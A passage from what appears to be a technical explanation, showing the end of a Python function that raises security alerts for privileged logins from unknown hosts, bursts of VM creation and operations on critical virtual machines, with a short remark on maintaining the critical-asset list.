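                alerts.append(("RV-D-229", f"privileged login by {user} from unknown host {e['ip']}"))
        elif typ == "VmCreatedEvent":
            dq = vm_ops[(user, typ)]
            _prune(dq, t)
            dq.append((t, e["vm"]))
            if len(dq) == create_threshold:
                alerts.append(("RV-D-223", f"{user} created {create_threshold} VMs within {WINDOW}s"))
        elif typ in VM_RULES and e["vm"] in CRITICAL_VMS:
            single, multi = VM_RULES[typ]
            alerts.append((single, f"{typ} on critical VM {e['vm']} by {user}"))
            dq = vm_ops[(user, typ)]
            _prune(dq, t)
            dq.append((t, e["vm"]))
            if len({vm for _, vm in dq}) == multi_threshold:
                alerts.append((multi, f"{user}: {typ} on {multi_threshold} critical VMs within {WINDOW}s"))
    return alerts
```

Keeping the single and multiple variants in one pass lets the "multiple" alert carry the same evidence as the three single alerts that preceded it; the critical-asset list is the part that needs maintenance, since every rule in the pair is silent for VMs that are not on it.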